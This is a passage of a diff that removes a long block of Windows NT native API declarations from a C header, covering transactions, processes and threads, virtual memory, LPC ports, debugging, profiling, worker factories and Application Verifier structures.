- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ LPGUID Uow,
- _In_opt_ HANDLE TmHandle,
- _In_opt_ ULONG CreateOptions,
- _In_opt_ ULONG IsolationLevel,
- _In_opt_ ULONG IsolationFlags,
- _In_opt_ PLARGE_INTEGER Timeout,
- _In_opt_ PUNICODE_STRING Description);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenTransaction(
- _Out_ PHANDLE TransactionHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ LPGUID Uow,
- _In_opt_ HANDLE TmHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRollbackTransaction(
- _In_ HANDLE TransactionHandle,
- _In_ BOOLEAN Wait);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCommitTransaction(
- _In_ HANDLE TransactionHandle,
- _In_ BOOLEAN Wait);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFreezeTransactions(
- _In_ PLARGE_INTEGER FreezeTimeout,
- _In_ PLARGE_INTEGER ThawTimeout);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtThawTransactions(
- VOID);
-
-//TmRm
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateResourceManager(
- _Out_ PHANDLE ResourceManagerHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ HANDLE TmHandle,
- _In_opt_ LPGUID ResourceManagerGuid,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ ULONG CreateOptions,
- _In_opt_ PUNICODE_STRING Description);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenResourceManager(
- _Out_ PHANDLE ResourceManagerHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ HANDLE TmHandle,
- _In_opt_ LPGUID ResourceManagerGuid,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-//TmEn
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateEnlistment(
- _Out_ PHANDLE EnlistmentHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ HANDLE ResourceManagerHandle,
- _In_ HANDLE TransactionHandle,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ ULONG CreateOptions,
- _In_ NOTIFICATION_MASK NotificationMask,
- _In_opt_ PVOID EnlistmentKey);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenEnlistment(
- _Out_ PHANDLE EnlistmentHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ HANDLE ResourceManagerHandle,
- _In_ LPGUID EnlistmentGuid,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);
-
-//TmTm
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateTransactionManager(
- _Out_ PHANDLE TmHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ PUNICODE_STRING LogFileName,
- _In_opt_ ULONG CreateOptions,
- _In_opt_ ULONG CommitStrength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenTransactionManager(
- _Out_ PHANDLE TmHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ PUNICODE_STRING LogFileName,
- _In_opt_ LPGUID TmIdentity,
- _In_opt_ ULONG OpenOptions);
-
-/************************************************************************************
-*
-* Process and Thread API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateUserProcess(
- _Out_ PHANDLE ProcessHandle,
- _Out_ PHANDLE ThreadHandle,
- _In_ ACCESS_MASK ProcessDesiredAccess,
- _In_ ACCESS_MASK ThreadDesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ProcessObjectAttributes,
- _In_opt_ POBJECT_ATTRIBUTES ThreadObjectAttributes,
- _In_ ULONG ProcessFlags,
- _In_ ULONG ThreadFlags,
- _In_opt_ PVOID ProcessParameters,
- _Inout_ PPS_CREATE_INFO CreateInfo,
- _In_opt_ PPS_ATTRIBUTE_LIST AttributeList);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenProcess(
- _Out_ PHANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ PCLIENT_ID ClientId);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtTerminateProcess(
- _In_opt_ HANDLE ProcessHandle,
- _In_ NTSTATUS ExitStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSuspendProcess(
- _In_ HANDLE ProcessHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtResumeProcess(
- _In_ HANDLE ProcessHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSuspendThread(
- _In_ HANDLE ThreadHandle,
- _Out_opt_ PULONG PreviousSuspendCount);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtResumeThread(
- _In_ HANDLE ThreadHandle,
- _Out_opt_ PULONG PreviousSuspendCount);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtOpenThread(
- _Out_ PHANDLE ThreadHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_opt_ PCLIENT_ID ClientId);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtTerminateThread(
- _In_opt_ HANDLE ThreadHandle,
- _In_ NTSTATUS ExitStatus);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtImpersonateThread(
- _In_ HANDLE ServerThreadHandle,
- _In_ HANDLE ClientThreadHandle,
- _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetContextThread(
- _In_ HANDLE ThreadHandle,
- _In_ PCONTEXT ThreadContext);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtGetContextThread(
- _In_ HANDLE ThreadHandle,
- _Inout_ PCONTEXT ThreadContext);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryInformationThread(
- _In_ HANDLE ThreadHandle,
- _In_ THREADINFOCLASS ThreadInformationClass,
- _Out_writes_bytes_(ThreadInformationLength) PVOID ThreadInformation,
- _In_ ULONG ThreadInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationThread(
- _In_ HANDLE ThreadHandle,
- _In_ THREADINFOCLASS ThreadInformationClass,
- _In_reads_bytes_(ThreadInformationLength) PVOID ThreadInformation,
- _In_ ULONG ThreadInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryInformationProcess(
- _In_ HANDLE ProcessHandle,
- _In_ PROCESSINFOCLASS ProcessInformationClass,
- _Out_writes_bytes_(ProcessInformationLength) PVOID ProcessInformation,
- _In_ ULONG ProcessInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationProcess(
- _In_ HANDLE ProcessHandle,
- _In_ PROCESSINFOCLASS ProcessInformationClass,
- _In_reads_bytes_(ProcessInformationLength) PVOID ProcessInformation,
- _In_ ULONG ProcessInformationLength);
-
-typedef VOID(*PPS_APC_ROUTINE) (
- _In_opt_ PVOID ApcArgument1,
- _In_opt_ PVOID ApcArgument2,
- _In_opt_ PVOID ApcArgument3);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueueApcThread(
- _In_ HANDLE ThreadHandle,
- _In_ PPS_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcArgument1,
- _In_opt_ PVOID ApcArgument2,
- _In_opt_ PVOID ApcArgument3);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueueApcThreadEx(
- _In_ HANDLE ThreadHandle,
- _In_opt_ HANDLE UserApcReserveHandle,
- _In_ PPS_APC_ROUTINE ApcRoutine,
- _In_opt_ PVOID ApcArgument1,
- _In_opt_ PVOID ApcArgument2,
- _In_opt_ PVOID ApcArgument3);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtYieldExecution(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtTestAlert(
- VOID);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateProcessEx(
- _Out_ PHANDLE ProcessHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE ParentProcess,
- _In_ ULONG Flags,
- _In_opt_ HANDLE SectionHandle,
- _In_opt_ HANDLE DebugPort,
- _In_opt_ HANDLE ExceptionPort,
- _In_ BOOLEAN InJob);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateThreadEx(
- _Out_ PHANDLE hThread,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ LPVOID ObjectAttributes,
- _In_ HANDLE ProcessHandle,
- _In_ LPTHREAD_START_ROUTINE lpStartAddress,
- _In_ LPVOID lpParameter,
- _In_ BOOL CreateSuspended,
- _In_ DWORD StackZeroBits,
- _In_ DWORD SizeOfStackCommit,
- _In_ DWORD SizeOfStackReserve,
- _Out_ LPVOID lpBytesBuffer);
-
-NTSYSAPI
-ULONG
-NTAPI
-NtGetCurrentProcessorNumber(
- VOID);
-
-/************************************************************************************
-*
-* License API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryLicenseValue(
- _In_ PUNICODE_STRING ValueName,
- _Out_opt_ PULONG Type,
- _Out_writes_bytes_to_opt_(DataSize, *ResultDataSize) PVOID Data,
- _In_ ULONG DataSize,
- _Out_ PULONG ResultDataSize);
-
-/************************************************************************************
-*
-* Virtual Memory API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAllocateVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID *BaseAddress,
- _In_ ULONG_PTR ZeroBits,
- _Inout_ PSIZE_T RegionSize,
- _In_ ULONG AllocationType,
- _In_ ULONG Protect);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFreeVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _Inout_ PVOID *BaseAddress,
- _Inout_ PSIZE_T RegionSize,
- _In_ ULONG FreeType);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _In_opt_ PVOID BaseAddress,
- _In_ MEMORY_INFORMATION_CLASS MemoryInformationClass,
- _Out_writes_bytes_(MemoryInformationLength) PVOID MemoryInformation,
- _In_ SIZE_T MemoryInformationLength,
- _Out_opt_ PSIZE_T ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetInformationVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _In_ VIRTUAL_MEMORY_INFORMATION_CLASS VmInformationClass,
- _In_ ULONG_PTR NumberOfEntries,
- _In_reads_(NumberOfEntries) PMEMORY_RANGE_ENTRY VirtualAddresses,
- _In_reads_bytes_(VmInformationLength) PVOID VmInformation,
- _In_ ULONG VmInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReadVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _In_opt_ PVOID BaseAddress,
- _Out_writes_bytes_(BufferSize) PVOID Buffer,
- _In_ SIZE_T BufferSize,
- _Out_opt_ PSIZE_T NumberOfBytesRead);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWriteVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _In_opt_ PVOID BaseAddress,
- _In_reads_bytes_(BufferSize) PVOID Buffer,
- _In_ SIZE_T BufferSize,
- _Out_opt_ PSIZE_T NumberOfBytesWritten);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtProtectVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _Inout_ PVOID *BaseAddress,
- _Inout_ PSIZE_T RegionSize,
- _In_ ULONG NewProtect,
- _Out_ PULONG OldProtect);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtLockVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _Inout_ PVOID *BaseAddress,
- _Inout_ PSIZE_T RegionSize,
- _In_ ULONG MapType);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtUnlockVirtualMemory(
- _In_ HANDLE ProcessHandle,
- _Inout_ PVOID *BaseAddress,
- _Inout_ PSIZE_T RegionSize,
- _In_ ULONG MapType);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtFlushInstructionCache(
- _In_ HANDLE ProcessHandle,
- _In_opt_ PVOID BaseAddress,
- _In_ SIZE_T Length);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreatePagingFile(
- _In_ PUNICODE_STRING PageFileName,
- _In_ PLARGE_INTEGER MinimumSize,
- _In_ PLARGE_INTEGER MaximumSize,
- _In_ ULONG Priority);
-
-/************************************************************************************
-*
-* Port API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreatePort(
- _Out_ PHANDLE PortHandle,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ ULONG MaxConnectionInfoLength,
- _In_ ULONG MaxMessageLength,
- _In_ ULONG MaxPoolUsage);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCompleteConnectPort(
- _In_ HANDLE PortHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtListenPort(
- _In_ HANDLE PortHandle,
- _Out_ PPORT_MESSAGE ConnectionRequest);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReplyPort(
- _In_ HANDLE PortHandle,
- _In_ PPORT_MESSAGE ReplyMessage);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReplyWaitReplyPort(
- _In_ HANDLE PortHandle,
- _Inout_ PPORT_MESSAGE ReplyMessage);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRequestPort(
- _In_ HANDLE PortHandle,
- _In_ PPORT_MESSAGE RequestMessage);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRequestWaitReplyPort(
- _In_ HANDLE PortHandle,
- _In_ PPORT_MESSAGE RequestMessage,
- _Out_ PPORT_MESSAGE ReplyMessage);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtClosePort(
- _In_ HANDLE PortHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReplyWaitReceivePort(
- _In_ HANDLE PortHandle,
- _Out_opt_ PVOID *PortContext,
- _In_opt_ PPORT_MESSAGE ReplyMessage,
- _Out_ PPORT_MESSAGE ReceiveMessage);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtWriteRequestData(
- _In_ HANDLE PortHandle,
- _In_ PPORT_MESSAGE Message,
- _In_ ULONG DataEntryIndex,
- _In_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG NumberOfBytesWritten);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReadRequestData(
- _In_ HANDLE PortHandle,
- _In_ PPORT_MESSAGE Message,
- _In_ ULONG DataEntryIndex,
- _Out_ PVOID Buffer,
- _In_ ULONG BufferSize,
- _Out_opt_ PULONG NumberOfBytesRead);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtConnectPort(
- _Out_ PHANDLE PortHandle,
- _In_ PUNICODE_STRING PortName,
- _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,
- _Inout_opt_ PPORT_VIEW ClientView,
- _Out_opt_ PREMOTE_PORT_VIEW ServerView,
- _Out_opt_ PULONG MaxMessageLength,
- _Inout_opt_ PVOID ConnectionInformation,
- _Inout_opt_ PULONG ConnectionInformationLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAcceptConnectPort(
- _Out_ PHANDLE PortHandle,
- _In_opt_ PVOID PortContext,
- _In_ PPORT_MESSAGE ConnectionRequest,
- _In_ BOOLEAN AcceptConnection,
- _Inout_opt_ PPORT_VIEW ServerView,
- _Out_opt_ PREMOTE_PORT_VIEW ClientView);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSecureConnectPort(
- _Out_ PHANDLE PortHandle,
- _In_ PUNICODE_STRING PortName,
- _In_ PSECURITY_QUALITY_OF_SERVICE SecurityQos,
- _Inout_opt_ PPORT_VIEW ClientView,
- _In_opt_ PSID RequiredServerSid,
- _Inout_opt_ PREMOTE_PORT_VIEW ServerView,
- _Out_opt_ PULONG MaxMessageLength,
- _Inout_opt_ PVOID ConnectionInformation,
- _Inout_opt_ PULONG ConnectionInformationLength);
-
-/************************************************************************************
-*
-* Boot Management API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtEnumerateBootEntries(
- _Out_writes_bytes_opt_(*BufferLength) PVOID Buffer,
- _Inout_ PULONG BufferLength);
-
-/************************************************************************************
-*
-* Reserve Objects API.
-*
-************************************************************************************/
-
-typedef enum _MEMORY_RESERVE_TYPE {
- MemoryReserveUserApc,
- MemoryReserveIoCompletion,
- MemoryReserveTypeMax
-} MEMORY_RESERVE_TYPE;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtAllocateReserveObject(
- _Out_ PHANDLE MemoryReserveHandle,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ MEMORY_RESERVE_TYPE Type);
-
-/************************************************************************************
-*
-* Debug API.
-*
-************************************************************************************/
-
-//
-// Define the debug object thats used to attatch to processes that are being debugged.
-//
-#define DEBUG_OBJECT_DELETE_PENDING (0x1) // Debug object is delete pending.
-#define DEBUG_OBJECT_KILL_ON_CLOSE (0x2) // Kill all debugged processes on close
-
-typedef struct _DEBUG_OBJECT {
- //
- // Event thats set when the EventList is populated.
- //
- KEVENT EventsPresent;
- //
- // Mutex to protect the structure
- //
- FAST_MUTEX Mutex;
- //
- // Queue of events waiting for debugger intervention
- //
- LIST_ENTRY EventList;
- //
- // Flags for the object
- //
- ULONG Flags;
-} DEBUG_OBJECT, *PDEBUG_OBJECT;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateDebugObject(
- _Out_ PHANDLE DebugObjectHandle,
- _In_ ACCESS_MASK DesiredAccess,
- _In_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ ULONG Flags);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtDebugActiveProcess(
- _In_ HANDLE ProcessHandle,
- _In_ HANDLE DebugObjectHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtRemoveProcessDebug(
- _In_ HANDLE ProcessHandle,
- _In_ HANDLE DebugObjectHandle);
-
-/************************************************************************************
-*
-* Profile API.
-*
-************************************************************************************/
-
-typedef enum _KPROFILE_SOURCE {
- ProfileTime,
- ProfileAlignmentFixup,
- ProfileTotalIssues,
- ProfilePipelineDry,
- ProfileLoadInstructions,
- ProfilePipelineFrozen,
- ProfileBranchInstructions,
- ProfileTotalNonissues,
- ProfileDcacheMisses,
- ProfileIcacheMisses,
- ProfileCacheMisses,
- ProfileBranchMispredictions,
- ProfileStoreInstructions,
- ProfileFpInstructions,
- ProfileIntegerInstructions,
- Profile2Issue,
- Profile3Issue,
- Profile4Issue,
- ProfileSpecialInstructions,
- ProfileTotalCycles,
- ProfileIcacheIssues,
- ProfileDcacheAccesses,
- ProfileMemoryBarrierCycles,
- ProfileLoadLinkedIssues,
- ProfileMaximum
-} KPROFILE_SOURCE;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateProfile(
- _Out_ PHANDLE ProfileHandle,
- _In_opt_ HANDLE Process,
- _In_ PVOID ProfileBase,
- _In_ SIZE_T ProfileSize,
- _In_ ULONG BucketSize,
- _In_reads_bytes_(BufferSize) PULONG Buffer,
- _In_ ULONG BufferSize,
- _In_ KPROFILE_SOURCE ProfileSource,
- _In_ KAFFINITY Affinity);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtStartProfile(
- _In_ HANDLE ProfileHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtStopProfile(
- _In_ HANDLE ProfileHandle);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryIntervalProfile(
- _In_ KPROFILE_SOURCE ProfileSource,
- _Out_ PULONG Interval);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSetIntervalProfile(
- _In_ ULONG Interval,
- _In_ KPROFILE_SOURCE Source);
-
-/************************************************************************************
-*
-* Worker Factory API.
-*
-************************************************************************************/
-
-typedef enum _WORKERFACTORYINFOCLASS {
- WorkerFactoryTimeout,
- WorkerFactoryRetryTimeout,
- WorkerFactoryIdleTimeout,
- WorkerFactoryBindingCount,
- WorkerFactoryThreadMinimum,
- WorkerFactoryThreadMaximum,
- WorkerFactoryPaused,
- WorkerFactoryBasicInformation,
- WorkerFactoryAdjustThreadGoal,
- WorkerFactoryCallbackType,
- WorkerFactoryStackInformation,
- WorkerFactoryThreadBasePriority,
- WorkerFactoryTimeoutWaiters,
- WorkerFactoryFlags,
- WorkerFactoryThreadSoftMaximum,
- MaxWorkerFactoryInfoClass
-} WORKERFACTORYINFOCLASS, *PWORKERFACTORYINFOCLASS;
-
-typedef struct _WORKER_FACTORY_BASIC_INFORMATION {
- LARGE_INTEGER Timeout;
- LARGE_INTEGER RetryTimeout;
- LARGE_INTEGER IdleTimeout;
- BOOLEAN Paused;
- BOOLEAN TimerSet;
- BOOLEAN QueuedToExWorker;
- BOOLEAN MayCreate;
- BOOLEAN CreateInProgress;
- BOOLEAN InsertedIntoQueue;
- BOOLEAN Shutdown;
- ULONG BindingCount;
- ULONG ThreadMinimum;
- ULONG ThreadMaximum;
- ULONG PendingWorkerCount;
- ULONG WaitingWorkerCount;
- ULONG TotalWorkerCount;
- ULONG ReleaseCount;
- LONGLONG InfiniteWaitGoal;
- PVOID StartRoutine;
- PVOID StartParameter;
- HANDLE ProcessId;
- SIZE_T StackReserve;
- SIZE_T StackCommit;
- NTSTATUS LastThreadCreationStatus;
-} WORKER_FACTORY_BASIC_INFORMATION, *PWORKER_FACTORY_BASIC_INFORMATION;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtCreateWorkerFactory(
- _Out_ PHANDLE WorkerFactoryHandleReturn,
- _In_ ACCESS_MASK DesiredAccess,
- _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
- _In_ HANDLE CompletionPortHandle,
- _In_ HANDLE WorkerProcessHandle,
- _In_ PVOID StartRoutine,
- _In_opt_ PVOID StartParameter,
- _In_opt_ ULONG MaxThreadCount,
- _In_opt_ SIZE_T StackReserve,
- _In_opt_ SIZE_T StackCommit);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtQueryInformationWorkerFactory(
- _In_ HANDLE WorkerFactoryHandle,
- _In_ WORKERFACTORYINFOCLASS WorkerFactoryInformationClass,
- _Out_writes_bytes_(WorkerFactoryInformationLength) PVOID WorkerFactoryInformation,
- _In_ ULONG WorkerFactoryInformationLength,
- _Out_opt_ PULONG ReturnLength);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtShutdownWorkerFactory(
- _In_ HANDLE WorkerFactoryHandle,
- _Inout_ volatile LONG *PendingWorkerCount);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtReleaseWorkerFactoryWorker(
- _In_ HANDLE WorkerFactoryHandle);
-
-/************************************************************************************
-*
-* Event Tracing API.
-*
-************************************************************************************/
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtTraceEvent(
- _In_ HANDLE TraceHandle,
- _In_ ULONG Flags,
- _In_ ULONG FieldSize,
- _In_ PVOID Fields);
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtTraceControl(
- _In_ ULONG FunctionCode,
- _In_reads_bytes_opt_(InBufferLen) PVOID InBuffer,
- _In_ ULONG InBufferLen,
- _Out_writes_bytes_opt_(OutBufferLen) PVOID OutBuffer,
- _In_ ULONG OutBufferLen,
- _Out_ PULONG ReturnLength);
-
-/************************************************************************************
-*
-* Kernel Debugger API.
-*
-************************************************************************************/
-
-typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION {
- BOOLEAN KernelDebuggerEnabled;
- BOOLEAN KernelDebuggerNotPresent;
-} SYSTEM_KERNEL_DEBUGGER_INFORMATION, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION;
-
-typedef struct _SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX {
- BOOLEAN DebuggerAllowed;
- BOOLEAN DebuggerEnabled;
- BOOLEAN DebuggerPresent;
-} SYSTEM_KERNEL_DEBUGGER_INFORMATION_EX, *PSYSTEM_KERNEL_DEBUGGER_INFORMATION_EX;
-
-typedef enum _SYSDBG_COMMAND {
- SysDbgQueryModuleInformation,
- SysDbgQueryTraceInformation,
- SysDbgSetTracepoint,
- SysDbgSetSpecialCall,
- SysDbgClearSpecialCalls,
- SysDbgQuerySpecialCalls,
- SysDbgBreakPoint,
- SysDbgQueryVersion,
- SysDbgReadVirtual,
- SysDbgWriteVirtual,
- SysDbgReadPhysical,
- SysDbgWritePhysical,
- SysDbgReadControlSpace,
- SysDbgWriteControlSpace,
- SysDbgReadIoSpace,
- SysDbgWriteIoSpace,
- SysDbgReadMsr,
- SysDbgWriteMsr,
- SysDbgReadBusData,
- SysDbgWriteBusData,
- SysDbgCheckLowMemory,
- SysDbgEnableKernelDebugger,
- SysDbgDisableKernelDebugger,
- SysDbgGetAutoKdEnable,
- SysDbgSetAutoKdEnable,
- SysDbgGetPrintBufferSize,
- SysDbgSetPrintBufferSize,
- SysDbgGetKdUmExceptionEnable,
- SysDbgSetKdUmExceptionEnable,
- SysDbgGetTriageDump,
- SysDbgGetKdBlockEnable,
- SysDbgSetKdBlockEnable,
- SysDbgRegisterForUmBreakInfo,
- SysDbgGetUmBreakPid,
- SysDbgClearUmBreakPid,
- SysDbgGetUmAttachPid,
- SysDbgClearUmAttachPid,
- SysDbgGetLiveKernelDump
-} SYSDBG_COMMAND, *PSYSDBG_COMMAND;
-
-typedef struct _SYSDBG_VIRTUAL {
- PVOID Address;
- PVOID Buffer;
- ULONG Request;
-} SYSDBG_VIRTUAL, *PSYSDBG_VIRTUAL;
-
-NTSYSAPI
-NTSTATUS
-NTAPI
-NtSystemDebugControl(
- _In_ SYSDBG_COMMAND Command,
- _Inout_updates_bytes_opt_(InputBufferLength) PVOID InputBuffer,
- _In_ ULONG InputBufferLength,
- _Out_writes_bytes_opt_(OutputBufferLength) PVOID OutputBuffer,
- _In_ ULONG OutputBufferLength,
- _Out_opt_ PULONG ReturnLength);
-
-/************************************************************************************
-*
-* Application Verifier API and definitions.
-*
-************************************************************************************/
-
-#ifndef DLL_PROCESS_VERIFIER
-#define DLL_PROCESS_VERIFIER 4
-#endif
-
-typedef VOID(NTAPI *RTL_VERIFIER_DLL_LOAD_CALLBACK)(
- PWSTR DllName,
- PVOID DllBase,
- SIZE_T DllSize,
- PVOID Reserved);
-
-typedef VOID(NTAPI *RTL_VERIFIER_DLL_UNLOAD_CALLBACK)(
- PWSTR DllName,
- PVOID DllBase,
- SIZE_T DllSize,
- PVOID Reserved);
-
-typedef VOID(NTAPI *RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK)(
- PVOID AllocationBase,
- SIZE_T AllocationSize);
-
-typedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {
- PCHAR ThunkName;
- PVOID ThunkOldAddress;
- PVOID ThunkNewAddress;
-} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;
-
-typedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {
- PWCHAR DllName;
- DWORD DllFlags;
- PVOID DllAddress;
- PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;
-} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;
-
-typedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {
- DWORD Length;
- PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;
- RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;
- RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;
- PWSTR VerifierImage;
- DWORD VerifierFlags;
- DWORD VerifierDebug;
- PVOID RtlpGetStackTraceAddress;
- PVOID RtlpDebugPageHeapCreate;
- PVOID RtlpDebugPageHeapDestroy;
- RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;
-} RTL_VERIFIER_PROVIDER_DESCRIPTOR, *PRTL_VERIFIER_PROVIDER_DESCRIPTOR;
-
-//
-// Application verifier standard flags.
-//
-#define RTL_VRF_FLG_FULL_PAGE_HEAP 0x00000001
-#define RTL_VRF_FLG_RESERVED_DONOTUSE 0x00000002
-#define RTL_VRF_FLG_HANDLE_CHECKS 0x00000004
-#define RTL_VRF_FLG_STACK_CHECKS 0x00000008
-#define RTL_VRF_FLG_APPCOMPAT_CHECKS 0x00000010
-#define RTL_VRF_FLG_TLS_CHECKS 0x00000020
-#define RTL_VRF_FLG_DIRTY_STACKS 0x00000040
-#define RTL_VRF_FLG_RPC_CHECKS 0x00000080
-#define RTL_VRF_FLG_COM_CHECKS 0x00000100
-#define RTL_VRF_FLG_DANGEROUS_APIS 0x00000200
